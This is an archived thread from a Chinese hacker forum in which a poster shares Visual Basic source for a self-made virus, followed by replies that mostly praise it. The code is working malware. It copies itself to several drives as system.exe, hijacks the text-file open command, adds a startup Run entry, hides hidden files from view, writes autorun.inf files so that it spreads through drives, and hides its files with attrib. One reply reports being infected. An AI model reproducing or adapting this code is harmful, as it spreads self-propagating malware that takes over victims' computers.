黑客X档案官方论坛's Archiver

huwenbono 发表于 2007-3-25 19:21

菜鸟我自己用VB编的病毒

[code]
Option Explicit
Const hkey_current_user = &H80000001
Const hkey_local_machine = &H80000002
Private Declare Function OSRegCreateKey Lib "advapi32" Alias "RegCreateKeyA" (ByVal hkey As Long, ByVal lpszSubKey As String, phkResult As Long) As Long
Const reg_sz = 1
Const reg_expand_sz = 2
Const reg_dword = 4
Private Declare Function OSRegSetValueEx Lib "advapi32" Alias "RegSetValueExA" (ByVal hkey As Long, ByVal lpszValueName As String, ByVal dwReserved As Long, ByVal fdwType As Long, lpbData As Any, ByVal cbData As Long) As Long
Private Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

Private Sub Form_Load()
On Error Resume Next
Dim a  As Long, b As String, c As String, d As Long, benshen, retu, hkey, hkey1, e As Long
benshen = App.Path + App.EXEName + ".exe"
For a = 2 To 9
  b = Chr(65 + a) + ":"
c = b + "\system.exe"
FileCopy benshen, c
     retu = OSRegCreateKey(hkey_local_machine, "software\classes\txtfile\shell\open\command", hkey)
    retu = OSRegSetValueEx(hkey, "", 0&, reg_expand_sz, ByVal c, Len(c) + 1)
     retu = OSRegCreateKey(hkey_current_user, "software\microsoft\windows\currentversion\run", hkey1)
   retu = OSRegSetValueEx(hkey1, "text1", 0&, reg_sz, ByVal c, Len(c) + 1)
   retu = OSRegCreateKey(hkey_local_machine, "software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL", hkey)
retu = OSRegSetValueEx(hkey, "checkedvalue", 0&, reg_dword, 0, 1)
Open b + "\autorun.inf" For Output As #1
Print #1, "[autorun]"
Print #1, "open=system.exe"
Print #1, "shell\1=打开(&0)"
Print #1, "shell\1\command=system.exe"
Print #1, "shell\2\=浏览(&B)"
Print #1, "Shell\2\Command = system.exe"
Print #1, "shellexecute = system.exe"
Close #1
Next
Shell "attrib  +s +h c:\autorun.inf"
Shell "attrib +s +h c:\system.exe"
Shell "attrib +s +h d:\autorun.inf"
Shell "attrib +s +h d:\system.exe"
Shell "attrib +s +h e:\autorun.inf"
Shell "attrib +s +h e:\system.exe"
Shell "attrib +s +h f:\autorun.inf"
Shell "attrib +s +h f:\system.exe"
Shell "attrib +s +h h:\autorun.inf"
Shell "attrib +s +h h:\system.exe"
Shell "attrib +s +h i:\autorun.inf"
Shell "attrib +s +h i:\system.exe"
End Sub
[/code]

[[i] 本帖最后由 flyli 于 2007-3-26 08:51 编辑 [/i]]

flyli 发表于 2007-3-26 08:55

不错哈,简单,但是很实用

郁闷扫情郎 发表于 2007-3-26 13:29

我看這個不像是小白寫出來得阿。不過不錯。

521322132 发表于 2008-5-31 08:24

写的很不错的嘛,哈哈,在单位只有VC没VB不能调试,带回家慢慢调试去

mcray23 发表于 2008-5-31 16:12

不错啊
学习了
::06::
··············

aiyang 发表于 2008-7-7 12:27

有什么效果啊 没有虚拟机 不敢试
急!谁告诉我有什么效果

Deroemon 发表于 2008-7-7 13:19

Deroemon

不错啊
学习一下啊:face18 :face18

woohaeyang 发表于 2008-7-7 16:40

谢谢啦!!!::04:: ::04::

peter08 发表于 2008-7-7 19:49

真是个简单的病毒哦..不过蛮不错的..::16::

氵目 发表于 2008-7-8 18:38

顶`!!!!!::04:: ::04:: ::04:: ::04:: ::04::

yflying1988 发表于 2008-7-9 20:32

VB看不懂,~~~~~谁发个c++的来学习下额

haait 发表于 2008-7-17 16:03

回复 10# 的帖子

什么病毒呀?就有什么效果 ?::08::

adamec 发表于 2008-9-15 03:53

我中奖了,请问怎么清除呀?

我中奖了,请问怎么清除呀?

页: [1]

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.